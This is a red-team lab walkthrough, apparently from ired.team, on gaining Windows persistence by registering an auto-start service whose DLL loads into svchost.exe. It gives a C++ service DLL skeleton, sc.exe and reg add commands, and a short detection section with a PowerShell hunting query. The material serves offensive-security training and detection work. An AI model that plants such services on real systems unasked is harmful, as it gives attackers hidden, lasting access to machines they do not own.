Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
Schtask
Service Execution
Sticky Keys
Create Account
AddMonitor()
NetSh Helper DLL
Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
Screensaver Hijack
Application Shimming
BITS Jobs
COM Hijacking
SIP & Trust Provider Hijacking
Hijacking Time Providers
Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Persisting in svchost.exe with a Service DLL
This is a quick lab that looks into a persistence mechanism that relies on installing a new Windows service, that will be hosted by an svchost.exe process.

Overview

At a high level, this is how the technique works:
  1. 1.
    Create a service EvilSvc.dll DLL (the DLL that will be loaded into an svchost.exe) with the code we want executed on each system reboot
  2. 2.
    Create a new service EvilSvc with binPath= svchost.exe
  3. 3.
    Add the ServiceDll value to EvilSvc service and point it to the service DLL compiled in step 1
  4. 4.
    Modify HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to specify under which group your service should be loaded into
  5. 5.
    Start EvilSvc service
  6. 6.
    The EvilSvc is started and its service DLL EvilSvc.dll is loaded into an svchost.exe

Walkthrough

1. Compile Service DLL

First of, let's compile our service DLL as EvilSvc.dll. This DLL is going to be loaded into an svchost.exe as part of our service EvilSvc that we will register in a second:
1
#include "pch.h"
2
#define SVCNAME TEXT("EvilSvc")
3
​
4
SERVICE_STATUS serviceStatus;
5
SERVICE_STATUS_HANDLE serviceStatusHandle;
6
HANDLE stopEvent = NULL;
7
​
8
VOID UpdateServiceStatus(DWORD currentState)
9
{
10
serviceStatus.dwCurrentState = currentState;
11
SetServiceStatus(serviceStatusHandle, &serviceStatus);
12
}
13
​
14
DWORD ServiceHandler(DWORD controlCode, DWORD eventType, LPVOID eventData, LPVOID context)
15
{
16
switch (controlCode)
17
{
18
case SERVICE_CONTROL_STOP:
19
serviceStatus.dwCurrentState = SERVICE_STOPPED;
20
SetEvent(stopEvent);
21
break;
22
case SERVICE_CONTROL_SHUTDOWN:
23
serviceStatus.dwCurrentState = SERVICE_STOPPED;
24
SetEvent(stopEvent);
25
break;
26
case SERVICE_CONTROL_PAUSE:
27
serviceStatus.dwCurrentState = SERVICE_PAUSED;
28
break;
29
case SERVICE_CONTROL_CONTINUE:
30
serviceStatus.dwCurrentState = SERVICE_RUNNING;
31
break;
32
case SERVICE_CONTROL_INTERROGATE:
33
break;
34
default:
35
break;
36
}
37
​
38
UpdateServiceStatus(SERVICE_RUNNING);
39
​
40
return NO_ERROR;
41
}
42
​
43
VOID ExecuteServiceCode()
44
{
45
stopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
46
UpdateServiceStatus(SERVICE_RUNNING);
47
​
48
// #####################################
49
// your persistence code here
50
// #####################################
51
​
52
while (1)
53
{
54
WaitForSingleObject(stopEvent, INFINITE);
55
UpdateServiceStatus(SERVICE_STOPPED);
56
return;
57
}
58
}
59
​
60
extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD argC, LPWSTR * argV)
61
{
62
serviceStatusHandle = RegisterServiceCtrlHandler(SVCNAME, (LPHANDLER_FUNCTION)ServiceHandler);
63
​
64
serviceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
65
serviceStatus.dwServiceSpecificExitCode = 0;
66
​
67
UpdateServiceStatus(SERVICE_START_PENDING);
68
ExecuteServiceCode();
69
}
Copied!

2. Create EvilSvc Service

Let's now create a new service called EvilSvc and specify the binPath to be svchost.exe -k DcomLaunch, which will tell Service Control Manager that we want our EvilSvc to be hosted by svchost.exe in a service group called DcomLaunch:
1
sc.exe create EvilSvc binPath= "c:\windows\System32\svchost.exe -k DcomLaunch" type= share start= auto
Copied!

3. Modify EvilSvc - Specify ServiceDLL Path

Next, inside HKLM\SYSTEM\CurrentControlSet\services\EvilSvc\, create a new value called ServiceDll and point it to the EvilSvc.dll service DLL compiled in step 1:
1
reg add HKLM\SYSTEM\CurrentControlSet\services\EvilSvc\Parameters /v ServiceDll /t REG_EXPAND_SZ /d C:\Windows\system32\EvilSvc.dll /f
Copied!
EvilSvc.dll must exist in C:\Windows\system32\EvilSvc.dll
At this point, our EvilSvc should be created with all the right parameters as seen in the registry:

4. Group EvilSvc with DcomLaunch

As a final step, we need to tell the Service Control Manager under which service group our EvilSvcshould load.
We want it to get loaded in the DcomLaunch group, so we need to add our service name EvilSvc in the list of services in the DcomLaunch value in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost:

5. Start EvilSvc Service

We can now try loading our EvilSvc service:
1
sc.exe start EvilSvc
Copied!
EvilSvc is now loaded into svchost.exe as part of a DcomLauncher services group:

Detection

Below are some initial thoughts on how one could start hunting for this technique:
  • Recently created services with svchost.exe as a binpath
  • Listing out ServiceDLL value for all system services and looking for DLLs that are loaded from suspicious locations (i.e non c:\windows\system32): Get-ItemProperty hklm:\SYSTEM\ControlSet001\Services\*\Parameters | ? { $_.servicedll } | select psparentpath, servicedll
EvilSvc.dll location sticking out

References

Writing a ServiceMain Function - Win32 apps
docsmsft
Previous
Hijacking Default File Extension
Next
Modifying .lnk Shortcuts
Last modified 1yr ago
Copy link
Contents
Overview
Walkthrough
1. Compile Service DLL
2. Create EvilSvc Service
3. Modify EvilSvc - Specify ServiceDLL Path
4. Group EvilSvc with DcomLaunch
5. Start EvilSvc Service
Detection
References